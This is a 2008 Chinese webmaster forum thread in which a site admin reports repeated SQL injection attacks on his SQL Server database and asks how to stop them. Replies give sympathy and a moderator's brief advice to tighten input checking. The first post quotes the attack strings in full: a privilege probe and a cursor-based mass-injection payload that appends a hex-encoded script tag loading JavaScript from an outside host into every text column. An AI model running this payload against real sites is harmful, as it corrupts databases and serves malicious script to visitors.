标题: [SQLServer] 网站数据库一天被注入N次 (查看:399 回复:9)
  本主题由 System 于 2008-5-22 05:00 解除限时高亮 
mdllm
学徒网管




UID 597625
精华 0
积分 3
帖子 135
MST币 258 点    
BST币 3 点    赚取
阅读权限 60
注册 2007-10-16
状态 离线
 
[ 使用道具 ]  
发表于 2008-5-13 17:25  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
爱琴思邮件系统iGENUS V5.0
网站数据库一天被注入N次
本帖发表在我是网管论坛,帖子地址:http://bbs.54master.com/250182,1,1
北京的IP一天注入我网站N次,封了他N个IP还是被注入,注入语句:www.sqqlmm.com/projectid=08031204 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

www.sqqlmm.com/ id=503;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=['+@c+']+cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536312532452536422536312533342533372532452537352537332F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--

在数据库中全加上http://

[ 点这里复制网址,推荐给你QQ/MSN上的好友们! ]
本站声明:以上内容由网友 mdllm 提供,与54master立场无关!
[ 顶部 ]
yangfei_5620
初级网管



UID 434516
精华 0
积分 129
帖子 322
MST币 1510 点    
BST币 129 点    赚取
阅读权限 80
注册 2006-9-8
状态 离线
 
[ 使用道具 ]  
发表于 2008-5-13 17:44  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
哈哈。。恭喜 恭喜

本站声明:以上内容由网友 yangfei_5620 提供,与54master立场无关!
《我是网管》论坛
[ 夲 期 飳 題 ]:   
⿴瞅誰,誰懷孕!⿴.﹖ ī 瞪誰,誰流產`.﹖ ⿴
[ 顶部 ]
mdllm
学徒网管




UID 597625
精华 0
积分 3
帖子 135
MST币 258 点    
BST币 3 点    赚取
阅读权限 60
注册 2007-10-16
状态 离线
 
[ 使用道具 ]  
发表于 2008-5-14 10:13  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
有人知道怎么防吗?可恶的攻击者

本站声明:以上内容由网友 mdllm 提供,与54master立场无关!
[ 顶部 ]
yueyueyueyue
学徒网管




UID 651667
精华 0
积分 5
帖子 19
MST币 59 点    
BST币 5 点    赚取
阅读权限 60
注册 2008-1-23
状态 离线
 
[ 使用道具 ]  
发表于 2008-5-14 19:40  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
我也有这个麻烦,X日的.真想搞S他

本站声明:以上内容由网友 yueyueyueyue 提供,与54master立场无关!
[ 顶部 ]
sin90
学徒网管




UID 726800
精华 0
积分 5
帖子 25
MST币 0 点    
BST币 5 点    赚取
阅读权限 60
注册 2008-5-14
状态 离线
 
[ 使用道具 ]  
发表于 2008-5-15 07:33  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
怎么防止呢。关键是。

本站声明:以上内容由网友 sin90 提供,与54master立场无关!
[ 顶部 ]
liuwei198401
入门网管




UID 313482
精华 0
积分 96
帖子 56
MST币 383 点    
BST币 96 点    赚取
阅读权限 70
注册 2004-4-11
状态 离线
 
[ 使用道具 ]  
发表于 2008-5-17 00:58  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
晕,是个麻烦。呵呵可惜帮不上忙/

本站声明:以上内容由网友 liuwei198401 提供,与54master立场无关!
[ 顶部 ]
特蓝克斯
版主

数据库技术


现役斑竹  
UID 102607
精华 10
积分 556
帖子 3637
MST币 8561 点    
BST币 556 点    赚取
阅读权限 180
注册 2004-3-7
来自 辽宁沈阳
状态 离线
 
[ 使用道具 ]  
发表于 2008-5-17 14:22  [ 资料 ]  [ 博客 ]  [ 主页 ] [ 短消息 ]  [ 加为好友QQ Yahoo!
那肯定是你程序上的判断,不够严谨,造成的!
查看一下啊日字。
修改一下程序

本站声明:以上内容由网友 特蓝克斯 提供,与54master立场无关!
《我是网管》论坛
-创想社区╄   博客圈:PHP开发团队
〖54ASP设计之旅Ⅰ〗:4714166 (已满) 〖54PHP设计之旅Ⅱ〗:7429484  〖54SQL设计之旅Ⅲ〗:7429318
〖创想网〗ASP技术(未满):18042617
[ 顶部 ]
yjtshkof
学徒网管




UID 728851
精华 0
积分 5
帖子 173
MST币 23 点    
BST币 5 点    赚取
阅读权限 60
注册 2008-5-18
状态 离线
 
[ 使用道具 ]  
发表于 2008-5-18 19:54  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
顶上来~~~~~~~~~~~~

本站声明:以上内容由网友 yjtshkof 提供,与54master立场无关!
[ 顶部 ]
yueyueyueyue
学徒网管




UID 651667
精华 0
积分 5
帖子 19
MST币 59 点    
BST币 5 点    赚取
阅读权限 60
注册 2008-1-23
状态 离线
 
[ 使用道具 ]  
发表于 2008-5-20 12:57  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
最好哪位详细发个教程来啊

本站声明:以上内容由网友 yueyueyueyue 提供,与54master立场无关!
[ 顶部 ]
  
 



当前时区 GMT+8, 现在时间是 2008-7-7 08:39

Powered by Discuz! 5.5.0  © 2001-2007 Comsenz Inc.
Processed in 0.041236 second(s), 13 queries , Gzip enabled

清除 Cookies - 关于我是网管 - 联系我是网管 - 广告服务 - 诚聘版主 - 无图版 - WAP -